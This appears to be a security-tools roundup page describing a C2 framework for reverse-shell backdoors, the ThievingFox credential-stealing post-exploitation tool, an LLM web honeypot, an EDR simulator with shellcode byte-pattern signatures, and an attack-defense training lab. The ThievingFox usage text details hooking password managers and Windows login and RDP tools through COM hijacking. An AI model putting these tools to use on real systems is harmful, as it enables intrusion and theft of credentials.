        4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


        C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

        By: Zion3R


        The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

        C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

        Reverse shells support:

        1. Reverse TCP
        2. Reverse HTTP
        3. Reverse HTTPS (configure it behind an LB)
        4. Telegram C2

        Demo

        C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
        Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
        Telegram C2: https://youtu.be/WLQtF4hbCKk

        Key Features

        πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
        πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
        πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
        πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

        Tech Stack

        πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
        πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
        🌐 Nginx: Effortlessly routing traffic between web and backend systems.
        πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
        πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
        πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

        Architecture

        Application setup

        • Management port: 9000
        • Reverse HTTP port: 8000
        • Reverse TCP port: 8888

        • Clone the repo

        • Optional: Update chat_id, bot_token in c2-telegram/config.yml
        • Execute docker-compose up -d to start the containers. Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

        Credits

        Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

        License

        Distributed under the MIT License. See LICENSE for more information.

        Contact



        ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

        By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

        The accompanying blog post can be found here


        Installation

        Linux

        Rustup must be installed, follow the instructions available here : https://rustup.rs/

        The mingw-w64 package must be installed. On Debian, this can be done using :

        apt install mingw-w64

        Both x86 and x86_64 windows targets must be installed for Rust:

        rustup target add x86_64-pc-windows-gnu
        rustup target add i686-pc-windows-gnu

        Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

        After adding Mono repositories, Nuget can be installed using apt :

        apt install nuget

Finally, python dependencies must be installed:

        pip install -r client/requirements.txt

        ThievingFox works with python >= 3.11.

        Windows

        Rustup must be installed, follow the instructions available here : https://rustup.rs/

        Both x86 and x86_64 windows targets must be installed for Rust:

        rustup target add x86_64-pc-windows-msvc
        rustup target add i686-pc-windows-msvc

        .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependencies must be installed:

        pip install -r client/requirements.txt

        ThievingFox works with python >= 3.11

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell)

        Targets

        All modules have been tested on the following Windows versions :

        Windows Version
        Windows Server 2022
        Windows Server 2019
        Windows Server 2016
        Windows Server 2012R2
        Windows 10
        Windows 11

[!CAUTION] Modules have not been tested on other versions, and are expected not to work.

        Application Injection Method
        KeePass.exe AppDomainManager Injection
        KeePassXC.exe DLL Proxying
        LogonUI.exe (Windows Login Screen) COM Hijacking
        consent.exe (Windows UAC Popup) COM Hijacking
        mstsc.exe (Windows default RDP client) COM Hijacking
        RDCMan.exe (Sysinternals' RDP client) COM Hijacking
        MobaXTerm.exe (3rd party RDP client) COM Hijacking

        Usage

        [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

        ThievingFox contains 3 main modules : poison, cleanup and collect.

        Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

        To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

        --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

        The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

        Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

        [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

        $ python3 client/ThievingFox.py poison -h
        usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
        [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
        [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of the domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Try to poison KeePass.exe
        --keepass-path KEEPASS_PATH
        The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
        --keepass-share KEEPASS_SHARE
        The share on which KeePass is installed (Default: c$)
        --keepassxc Try to poison KeePassXC.exe
        --keepassxc-path KEEPASSXC_PATH
        The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
        --keepassxc-share KEEPASSXC_SHARE
        The share on which KeePassXC is installed (Default: c$)
        --mstsc Try to poison mstsc.exe
        --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
        logged in (Default: False)
        --consent Try to poison Consent.exe
        --logonui Try to poison LogonUI.exe
        --rdcman Try to poison RDCMan.exe
        --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
        logged in (Default: False)
        --mobaxterm Try to poison MobaXTerm.exe
        --mobaxterm-poison-hkcr
        Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
        logged in (Default: False)
        --all Try to poison all applications
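
The target format shown in the usage ([domain/]username[:password]@<IP or FQDN>[/CIDR]) can be parsed along these lines (an illustrative sketch, not ThievingFox's actual parser):

```python
import re

# One named group per component of the target specification;
# domain, password, and CIDR are optional.
TARGET_RE = re.compile(
    r"^(?:(?P<domain>[^/@:]+)/)?"   # optional domain/
    r"(?P<username>[^@:]+)"         # username
    r"(?::(?P<password>[^@]+))?"    # optional :password
    r"@(?P<host>[^/]+)"             # @IP or FQDN
    r"(?:/(?P<cidr>\d{1,2}))?$"     # optional /CIDR for a range
)

def parse_target(target):
    """Split a target string into its components (None when absent)."""
    match = TARGET_RE.match(target)
    if not match:
        raise ValueError(f"invalid target: {target}")
    return match.groupdict()
```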

        Cleanup

For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

        Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

        It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

        $ python3 client/ThievingFox.py cleanup -h
        usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
        [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
        [--rdcman] [--mobaxterm] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of the domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
        --keepass-share KEEPASS_SHARE
        The share on which KeePass is installed (Default: c$)
        --keepass-path KEEPASS_PATH
        The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
        --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
        --keepassxc-path KEEPASSXC_PATH
        The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
        --keepassxc-share KEEPASSXC_SHARE
        The share on which KeePassXC is installed (Default: c$)
        --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
        --consent Try to cleanup all poisonning artifacts related to Consent.exe
        --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
        --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
        --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
        --all Try to cleanup all poisonning artifacts related to all applications

        Collect

For each application specified in the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/output/.

        Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

        $ python3 client/ThievingFox.py collect -h
        usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
        [--logonui] [--rdcman] [--mobaxterm] [--all]
        target

        positional arguments:
        target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

        options:
        -h, --help show this help message and exit
        -hashes HASHES, --hashes HASHES
        LM:NT hash
        -aesKey AESKEY, --aesKey AESKEY
        AES key to use for Kerberos Authentication
        -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
        -dc-ip DC_IP, --dc-ip DC_IP
        IP Address of the domain controller
        -no-pass, --no-pass Do not prompt for password
        --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
        --keepass Collect KeePass.exe logs
        --keepassxc Collect KeePassXC.exe logs
        --mstsc Collect mstsc.exe logs
        --consent Collect Consent.exe logs
        --logonui Collect LogonUI.exe logs
        --rdcman Collect RDCMan.exe logs
        --mobaxterm Collect MobaXTerm.exe logs
        --all Collect logs from all applications


        Galah - An LLM-powered Web Honeypot Using The OpenAI API

        By: Zion3R


        TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


        Description

        Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

        I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
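
The per-port caching described above amounts to keying the cache on both port and request; a Python model of that idea (Galah itself is written in Go, so this is illustrative, not its actual cache code):

```python
import time

class ResponseCache:
    """Cache LLM-generated responses per (port, request) with an expiry."""

    def __init__(self, duration_seconds):
        self.duration = duration_seconds
        self.entries = {}

    def put(self, port, request_key, response):
        self.entries[(port, request_key)] = (response, time.time())

    def get(self, port, request_key):
        item = self.entries.get((port, request_key))
        if item is None:
            return None
        response, stored_at = item
        if time.time() - stored_at > self.duration:
            del self.entries[(port, request_key)]  # expired entry
            return None
        return response
```

Because the port is part of the key, a response cached for one port is never reused for the same request arriving on a different port.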

        The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

        Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

        Future Enhancements

        • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

        • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

        • Support for Other LLMs.

        Getting Started

        • Ensure you have Go version 1.20+ installed.
        • Create an OpenAI API key from here.
        • If you want to serve over HTTPS, generate TLS certificates.
        • Clone the repo and install the dependencies.
        • Update the config.yaml file.
        • Build and run the Go binary!
        % git clone git@github.com:0x4D31/galah.git
        % cd galah
        % go mod download
        % go build
        % ./galah -i en0 -v

        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
        β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
        llm-based web honeypot // version 1.0
        author: Adel "0x4D31" Karimi

        2024/01/01 04:29:10 Starting HTTP server on port 8080
        2024/01/01 04:29:10 Starting HTTP server on port 8888
        2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
        2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

        2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
        2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
        2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
        2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

        ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
        2024/01/01 04:39:27 All servers shut down gracefully.

        Example Responses

        Here are some example responses:

        Example 1

        % curl http://localhost:8080/login.php
        <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

        JSON log record:

        {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
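The hash fields in the log record can be reproduced in a few lines. The `bodySha256` of an empty body matches the well-known SHA-256 of the empty string seen above; the exact input string Galah canonicalizes for `headersSortedSha256` is an assumption here (comma-joined, alphabetically sorted header names, matching the `headersSorted` field).

```python
import hashlib

def body_sha256(body: bytes) -> str:
    # SHA-256 of the raw request body; an empty body yields the
    # e3b0c442... digest that appears in the log records above.
    return hashlib.sha256(body).hexdigest()

def headers_sorted_sha256(headers: dict) -> str:
    # Assumption: digest over the comma-joined, sorted header names,
    # as suggested by the "headersSorted" field. Galah's actual
    # canonical form may differ.
    joined = ",".join(sorted(headers))
    return hashlib.sha256(joined.encode()).hexdigest()
```
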

        Example 2

        % curl http://localhost:8080/.aws/credentials
        [default]
        aws_access_key_id = AKIAIOSFODNN7EXAMPLE
        aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
        region = us-west-2

        JSON log record:

        {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

        Okay, that was impressive!

        Example 3

        Now, let's do some sort of adversarial testing!

        % curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

        JSON log record:

        {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

        πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server
        No, I am not a fake server.

        JSON log record:

        {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

        You're a galah, mate!



        CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

        By: Zion3R


        CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


        Features

        Detection Description
        Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
        NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
        AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
        ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
        PE Stomping Identifies instances of PE (Portable Executable) stomping.
        Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
        Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
        Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
        API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
        Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

        Installation

        To get started with CrimsonEDR, follow these steps:

1. Install the dependency: bash sudo apt-get install gcc-mingw-w64-x86-64
        2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
        3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

        ⚠️ Warning

        Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

        Usage

        To use CrimsonEDR, follow these steps:

        1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
        {
        "IOC": [
        ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
        ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
        ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
        ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
        ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
        ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
        ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
        ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
        ]
        }
2. Execute CrimsonEDRPanel.exe with the following arguments:

          • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

          • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

        For example:

        .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
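To make the ioc.json format concrete, here is a userland sketch of how such byte patterns could be parsed and matched against a memory buffer. This is illustrative only; it is not CrimsonEDR's actual DLL scanning logic.

```python
import json

def parse_ioc_patterns(ioc_json: str):
    """Parse the ioc.json format shown above into byte strings."""
    data = json.loads(ioc_json)
    return [bytes(int(b, 16) for b in pattern) for pattern in data["IOC"]]

def scan_buffer(buffer: bytes, patterns):
    """Return (offset, pattern) for every IOC pattern found in a buffer.
    Illustrative sketch of signature matching, not CrimsonEDR's code."""
    hits = []
    for pattern in patterns:
        offset = buffer.find(pattern)
        if offset != -1:
            hits.append((offset, pattern))
    return hits
```
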

        Useful Links

        Here are some useful resources that helped in the development of this project:

        Contact

        For questions, feedback, or support, please reach out to me via:



        CSAF - Cyber Security Awareness Framework

        By: Zion3R

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


        Requirements

        Software

        • Docker
        • Docker-compose

        Hardware

        Minimum

        • 4 Core CPU
        • 10GB RAM
        • 60GB Disk free

        Recommendation

        • 8 Core CPU or above
        • 16GB RAM or above
        • 100GB Disk free or above

        Installation

        Clone the repository

        git clone https://github.com/csalab-id/csaf.git

        Navigate to the project directory

        cd csaf

        Pull the Docker images

        docker-compose --profile=all pull

        Generate wazuh ssl certificate

        docker-compose -f generate-indexer-certs.yml run --rm generator

For security reasons, you should first set environment variables like this:

        export ATTACK_PASS=ChangeMePlease
        export DEFENSE_PASS=ChangeMePlease
        export MONITOR_PASS=ChangeMePlease
        export SPLUNK_PASS=ChangeMePlease
        export GOPHISH_PASS=ChangeMePlease
        export MAIL_PASS=ChangeMePlease
        export PURPLEOPS_PASS=ChangeMePlease

        Start all the containers

        docker-compose --profile=all up -d

You can run specific labs by selecting one of the following profiles:

        • all
        • attackdefenselab
        • phisinglab
        • breachlab
        • soclab

        For example

        docker-compose --profile=attackdefenselab up -d

        Proof



        Exposed Ports

An exposed port can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose one for the best experience.

        • Port 6080 (Access to attack network)
        • Port 7080 (Access to defense network)
        • Port 8080 (Access to monitor network)

        Example usage

        Access internal network with proxy socks5

        • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
        • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
        • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

        Remote ssh with ssh client

        • ssh kali@ipaddress -p 6080 (default password: attackpassword)
        • ssh kali@ipaddress -p 7080 (default password: defensepassword)
        • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

        Access kali linux desktop with curl / browser

        • curl http://ipaddress:6080/vnc.html
        • curl http://ipaddress:7080/vnc.html
        • curl http://ipaddress:8080/vnc.html

        Domain Access

        • http://attack.lab/vnc.html (default password: attackpassword)
        • http://defense.lab/vnc.html (default password: defensepassword)
        • http://monitor.lab/vnc.html (default password: monitorpassword)
        • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
        • https://server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
        • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
        • https://mail.server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
        • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
        • http://phising.lab/
        • http://10.0.0.200:8081/
        • http://gitea.lab/ (default username: csalab, default password: giteapassword)
        • http://dvwa.lab/ (default username: admin, default password: password)
        • http://dvwa-monitor.lab/ (default username: admin, default password: password)
        • http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
        • http://wackopicko.lab/
        • http://juiceshop.lab/
        • https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
        • https://wazuh-manager.lab/
        • https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
        • http://splunk.lab/ (default username: admin, default password: splunkpassword)
        • https://infectionmonkey.lab:5000/
        • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
        • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

        Network / IP Address

        Attack

        • 10.0.0.100 attack.lab
